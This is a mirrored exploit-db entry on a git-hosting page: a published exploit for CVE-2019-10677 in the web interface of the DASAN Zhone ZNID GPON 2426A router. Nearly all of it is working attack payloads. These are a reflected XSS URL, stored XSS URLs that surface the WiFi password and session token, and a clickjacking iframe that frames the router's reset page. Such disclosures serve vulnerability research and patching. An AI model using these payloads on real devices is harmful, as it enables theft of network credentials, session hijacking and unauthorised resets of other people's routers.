bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/47351.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
Reference in a new issue View git blame Copy permalink